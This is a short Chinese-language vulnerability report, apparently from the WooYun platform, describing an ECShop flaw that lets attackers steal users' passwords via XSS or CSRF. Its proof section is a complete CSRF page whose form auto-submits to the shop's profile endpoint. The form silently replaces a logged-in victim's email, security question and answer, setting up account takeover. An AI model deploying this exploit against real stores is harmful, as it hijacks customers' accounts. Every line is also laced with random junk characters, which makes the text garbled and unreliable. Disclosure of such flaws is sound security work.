简要描述:
9 w3 K* N% Y5 Hecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
" D" z# {1 w) A6 _$ q# Z/ m7 I. U1 C2 R8 e
Demo For:http://www.wooyun.org/bug.php?action=view&id=395- h& ]. o! y0 l* L" k
" n# G) N2 v' e8 {0 a
详细说明:
: X$ Y. f" _; \0 `# z利用csrf和xss可以突破官方所说的“障碍”& b2 Q0 t+ v0 B; V# k9 K5 C
xss版本已经有人说明
! z8 V" U& K0 b2 G! ^这里给出csrf版本8 p' L8 v! P. l+ l
; F; |' H, P& ~6 U a! {5 I
漏洞证明:
% F' W& P1 ]! l/ S: V<html>
4 R1 ~! M4 o2 U6 V& }6 N<body>
^$ x% I [2 y4 N<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
+ z) S( W: g, U<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">, [3 X: p" {% y* S) F
<INPUT TYPE="text" NAME="act" value="act_edit_profile">, s W" R$ G9 c( A% G
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
- E6 F# V1 A" @+ [6 O7 D3 G<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
, q2 y9 O1 z; \: b6 l0 |. F</body>* K4 K7 v z( N1 v; C6 b+ }
<script>6 O a( b t4 V2 q
document.forms[0].submit();
9 Z" A, A5 }' K4 g; c5 u</script>4 s$ I; }; T0 Z9 K
</html>( t+ R! }; i/ n9 K. L J1 ^
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失7 q0 P9 n9 A8 r8 X* T9 F0 z" @' A4 N
) W4 V6 d* Q6 n$ m7 ?- U( l0 ?; [ |